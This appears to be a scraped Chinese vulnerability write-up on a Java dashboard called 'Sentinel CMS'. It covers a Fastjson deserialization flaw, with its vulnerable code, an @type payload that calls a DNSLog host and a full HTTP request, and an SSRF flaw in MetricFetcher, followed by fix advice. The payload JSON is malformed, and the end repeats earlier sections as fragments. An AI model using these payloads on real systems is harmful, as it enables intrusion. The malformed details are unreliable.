Sentinel CMS漏洞分析与复现指南<\/h1>

一、CMS简介<\/h2>
Sentinel CMS是一个基于Java的Web应用管理系统，本文档将详细分析其存在的两个关键漏洞：Fastjson反序列化漏洞和SSRF(服务器端请求伪造)漏洞。<\/p>

二、环境搭建<\/h2>

1. 准备工作<\/h3>

下载Sentinel CMS源码<\/li>
使用IntelliJ IDEA导入项目<\/li>

配置Java开发环境(JDK 1.8+)<\/li> <\/ul>

2. 启动环境<\/h3>

默认登录凭证：sentinel\/sentinel<\/code><\/li>

启动后访问本地地址(通常为http:\/\/127.0.0.1:8080)<\/li>
<\/ul>
三、Fastjson漏洞分析<\/h2>
1. 漏洞背景<\/h3>

系统使用了存在漏洞的Fastjson 1.2.71版本<\/li>
Fastjson是阿里巴巴开源的Java JSON处理库<\/li>
该版本存在已知的反序列化漏洞(CVE-2022-25845等)<\/li>
<\/ul>
2. 漏洞定位<\/h3>

在pom.xml<\/code>中确认Fastjson版本<\/li>
全局搜索parseObject<\/code>关键字<\/li>
定位到ClusterConfigController<\/code>类<\/li>
<\/ul>
3. 漏洞代码分析<\/h3>
\/\/ ClusterConfigController.java
<\/span><\/span><\/span>\/\/ 接受payload参数直接进行JSON.parseObject操作
<\/span><\/span><\/span><\/span>@PostMapping<\/span>(<\/span>"\/cluster\/config\/modify_single"<\/span>)<\/span>
<\/span><\/span>public<\/span> Result<?><\/span> apiModifySingleConfig(<\/span>@RequestParam<\/span> String payload)<\/span> {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        ClusterClientAssignConfig config =<\/span> JSON.<\/span>parseObject<\/span>(<\/span>payload,<\/span> ClusterClientAssignConfig.<\/span>class<\/span>);<\/span>
<\/span><\/span>        \/\/ ...后续处理逻辑
<\/span><\/span><\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        return<\/span> Result.<\/span>ofFail<\/span>(-<\/span>1<\/span>,<\/span> e.<\/span>getMessage<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 漏洞利用<\/h3>

接口路径：\/cluster\/config\/modify_single<\/code><\/li>
请求方法：POST<\/li>
参数名：payload<\/code><\/li>
<\/ul>
攻击Payload示例：<\/h4>
{
<\/span><\/span>    "@type"<\/span>:"java.net.InetSocketAddress"<\/span>,
<\/span><\/span>    "address"<\/span>:,
<\/span><\/span>    "val"<\/span>:"xx.dnslog.cn"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>完整HTTP请求示例：<\/h4>
POST<\/span> \/cluster\/config\/modify_single HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8080<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\/20100101 Firefox\/52.0<\/span>
<\/span><\/span>Accept:<\/span> application\/json, text\/plain, *\/*<\/span>
<\/span><\/span>Accept-Language:<\/span> zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate, br<\/span>
<\/span><\/span>Referer:<\/span> http:\/\/127.0.0.1:8080\/<\/span>
<\/span><\/span>Cookie:<\/span> _jspxcms=eab79fcb94a54dbb9b2e4a45f27b5d7b; sentinel_dashboard_cookie=4C92FE586248ACC2A606B96B7A77DE03<\/span>
<\/span><\/span>DNT:<\/span> 1<\/span>
<\/span><\/span>Connection:<\/span> keep-alive<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>Content-Length:<\/span> 77<\/span>
<\/span><\/span>
<\/span><\/span>{"@type":"java.net.InetSocketAddress"{"address":,"val":"xx.dnslog.cn"}}
<\/span><\/span><\/code><\/pre>5. 漏洞验证<\/h3>

使用DNSLog平台生成域名<\/li>
发送Payload后检查DNSLog是否有解析记录<\/li>
有记录则证明漏洞存在<\/li>
<\/ul>
四、SSRF漏洞分析<\/h2>
1. 漏洞位置<\/h3>

类文件：MetricFetcher.java<\/code><\/li>
路径：sentinel-dashboard\/src\/main\/java\/com\/alibaba\/csp\/sentinel\/dashboard\/metric\/<\/code><\/li>
<\/ul>
2. 漏洞原理<\/h3>

系统未对用户提供的URL进行严格校验<\/li>
攻击者可构造恶意请求访问内网服务<\/li>
<\/ul>
3. 关键代码分析<\/h3>
\/\/ MetricFetcher.java
<\/span><\/span><\/span><\/span>public<\/span> void<\/span> fetchAll<\/span>()<\/span> {<\/span>
<\/span><\/span>    \/\/ 获取所有应用列表
<\/span><\/span><\/span><\/span>    List<<\/span>AppInfo><\/span> apps =<\/span> appManagement.<\/span>getBriefApps<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    for<\/span> (<\/span>AppInfo app :<\/span> apps)<\/span> {<\/span>
<\/span><\/span>        \/\/ 获取应用metric信息
<\/span><\/span><\/span><\/span>        String url =<\/span> "http:\/\/"<\/span> +<\/span> app.<\/span>getIp<\/span>()<\/span> +<\/span> ":"<\/span> +<\/span> app.<\/span>getPort<\/span>()<\/span> +<\/span> "\/metric"<\/span>;<\/span>
<\/span><\/span>        \/\/ 发起HTTP请求
<\/span><\/span><\/span><\/span>        String metricContent =<\/span> fetchMetricContent(<\/span>url);<\/span>
<\/span><\/span>        \/\/ 处理metric数据
<\/span><\/span><\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 漏洞利用条件<\/h3>

攻击者需要能够控制或影响AppInfo<\/code>中的IP和端口信息<\/li>
系统未对app.getIp()<\/code>和app.getPort()<\/code>进行有效过滤<\/li>
<\/ul>
5. 攻击场景<\/h3>

通过应用注册接口提交恶意IP和端口<\/li>
系统向攻击者控制的服务器发起请求<\/li>
利用此漏洞探测或攻击内网服务<\/li>
<\/ol>
五、修复建议<\/h2>
1. Fastjson漏洞修复<\/h3>

升级Fastjson到最新安全版本(1.2.83+)<\/li>
或使用其他JSON库如Jackson、Gson<\/li>
添加JSON解析时的类型白名单<\/li>
<\/ul>
2. SSRF漏洞修复<\/h3>

对用户输入的IP和端口进行严格校验<\/li>
使用正则表达式限制IP格式<\/li>
禁止访问内网IP段(10.0.0.0\/8, 172.16.0.0\/12, 192.168.0.0\/16)<\/li>
实现URL白名单机制<\/li>
<\/ul>
六、总结<\/h2>
Sentinel CMS存在两个高危漏洞：<\/p>

Fastjson反序列化漏洞：可导致远程代码执行<\/li>
SSRF漏洞：可导致内网服务探测和攻击<\/li>
<\/ol>
开发人员应及时升级依赖库并实施输入验证，安全团队应检查系统是否存在这些漏洞并及时修复。<\/p>

Sentinel CMS漏洞分析与复现指南<\/h1>

一、CMS简介<\/h2> Sentinel CMS是一个基于Java的Web应用管理系统，本文档将详细分析其存在的两个关键漏洞：Fastjson反序列化漏洞和SSRF(服务器端请求伪造)漏洞。<\/p>

二、环境搭建<\/h2>

三、Fastjson漏洞分析<\/h2>

四、SSRF漏洞分析<\/h2>

五、修复建议<\/h2>

一、CMS简介<\/h2>
Sentinel CMS是一个基于Java的Web应用管理系统，本文档将详细分析其存在的两个关键漏洞：Fastjson反序列化漏洞和SSRF(服务器端请求伪造)漏洞。<\/p>